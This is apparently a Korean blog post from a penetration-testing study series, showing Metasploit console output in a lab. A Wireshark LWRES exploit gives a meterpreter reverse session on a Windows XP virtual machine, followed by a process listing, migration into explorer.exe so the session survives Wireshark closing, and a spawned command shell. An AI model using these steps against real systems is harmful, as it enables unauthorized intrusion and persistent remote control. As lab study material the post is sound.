Victim에서 와이어샤크를 종료하면 연결이 끊어지고 와이어샤크에서 덤프를 받고 다시 공격을 시도한다.
msf6 exploit(multi/misc/wireshark_lwres_getaddrbyname_loop) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x86/windows VICTIM_WINXP\ksw @ VICTIM_WINX 192.168.108.102:4444 -> 192.168
P .108.105:1036 (192.168.108.105
)
msf6 exploit(multi/misc/wireshark_lwres_getaddrbyname_loop) > sessions 2
[*] Starting interaction with 2...
meterpreter > help migrate
Usage: migrate <<pid> | -P <pid> | -N <name>> [-t timeout]
Migrates the server instance to another process.
NOTE: Any open channels or other dynamic state will be lost.
meterpreter > help ps
Usage: ps [ options ] pattern
Use the command with no arguments to see all running processes.
The following options can be used to filter those results:
OPTIONS:
-A <opt> Filter on architecture
-S <opt> Filter on process name
-U <opt> Filter on user name
-c Filter only child processes of the current shell
-h Help menu.
-s Filter only SYSTEM processes
-x Filter for exact matches rather than regex
meterpreter > ps
| Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process ] 4 0 System x86 0 208 904 wmiprvse.exe x86 0 C:\WINDOWS\system32\wbem\wmiprvse. exe 324 1020 wscntfy.exe x86 0 VICTIM_WINXP\ksw C:\WINDOWS\system32\wscntfy.exe 492 1376 wireshark.exe x86 0 VICTIM_WINXP\ksw C:\Program Files\Wireshark\wiresha rk.exe 584 728 alg.exe x86 0 C:\WINDOWS\System32\alg.exe 596 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 636 1376 rundll32.exe x86 0 VICTIM_WINXP\ksw C:\WINDOWS\system32\rundll32.exe 660 596 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 684 596 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.e xe 728 684 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 740 684 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 800 492 dumpcap.exe x86 0 VICTIM_WINXP\ksw C:\Program Files\Wireshark\dumpcap .exe 892 728 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Too ls\vmacthlp.exe 904 728 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 936 1376 vmtoolsd.exe x86 0 VICTIM_WINXP\ksw C:\Program Files\VMware\VMware Too ls\vmtoolsd.exe 984 728 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1020 728 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1072 728 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1128 728 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1144 1376 ctfmon.exe x86 0 VICTIM_WINXP\ksw C:\WINDOWS\system32\ctfmon.exe 1276 1452 conime.exe x86 0 VICTIM_WINXP\ksw C:\WINDOWS\system32\conime.exe 1376 1348 explorer.exe x86 0 VICTIM_WINXP\ksw C:\WINDOWS\Explorer.EXE 1488 728 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1584 728 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1688 728 VGAuthService.e x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Too xe ls\VMware VGAuth\VGAuthService.exe 1784 728 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Too ls\vmtoolsd.exe 1980 1020 wuauclt.exe x86 0 VICTIM_WINXP\ksw C:\WINDOWS\system32\wuauclt.exe |
meterpreter > migrate 1376
[*] Migrating from 492 to 1376...
[*] Migration completed successfully.
meterpreter > shell
Process 184 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\ksw>exit
exit
meterpreter >
'Linux > 모의해킹' 카테고리의 다른 글
| PoC 란?? (0) | 2022.01.04 |
|---|---|
| 계산기 쉘 코드 생성 후 Windows XP 공격 (0) | 2022.01.04 |
| Wireshark 취약점을 이용한 자동 공격 (0) | 2022.01.04 |
| msfvenom 을 이용한 쉘 코드 추출하기 (0) | 2022.01.03 |
| 쉘 코드란?? (0) | 2022.01.03 |